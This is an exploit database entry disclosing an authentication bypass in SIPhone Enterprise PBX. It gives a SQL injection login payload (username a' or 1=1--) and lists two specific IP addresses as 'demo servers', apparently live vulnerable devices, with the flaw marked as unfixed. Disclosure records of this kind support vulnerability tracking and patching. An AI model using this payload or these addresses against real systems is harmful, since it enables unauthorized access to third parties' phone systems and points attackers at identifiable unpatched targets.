SIPhone Enterprise PBX - Remote Authentication bypass Vulnerability

2015-02-01T00:00:00
ID 1337DAY-ID-23222
Type zdt
Reporter BaD-HaCKeR-MaN
Modified 2015-02-01T00:00:00

Description

Exploit for php platform in category remote exploits

                                        
                                            ###########################################################################################
##  ____ ___ ____  _                         E                                           ##
## / ___|_ _|  _ \| |__   ___  _ __   ___    X                   By                      ##
## \___ \| || |_) | '_ \ / _ \| '_ \ / _ \   P              BaD-HaCKeR-MaN               ##
##  ___) | ||  __/| | | | (_) | | | |  __/   L      TheMostCompleteHackerInTheWorld      ##
## |____/___|_|   |_| |_|\___/|_| |_|\___|   O          [email protected]        ##
##                                           I                                           ##
##                                           T                                           ##
###########################################################################################
[+] SIPhone Enterprise PBX Suffers from a Remote Authentication Bypass Vulnerability
[+] Product: SIPhone Enterprise PBX 
[+] Vendor: BELLBRIDGE s.r.o.
[+] Vulnerability Type: Authentication Bypass Vulnerability 
[+] Risk Level: High
[+] Solution Status: Not Fixed Yet
[+] Discovered and Provided By: BaD-HaCKeR-MaN https://www.facebook.com/TheMostCompleteHackerInTheWorld

[+] Exploit : 
By browsing the PBX device and logging by :
   Username: a' or 1=1--
   Password: Test

[+] Demo Server :
   https://94.112.253.250/
   https://88.208.65.41/


#  0day.today [2018-04-02]  #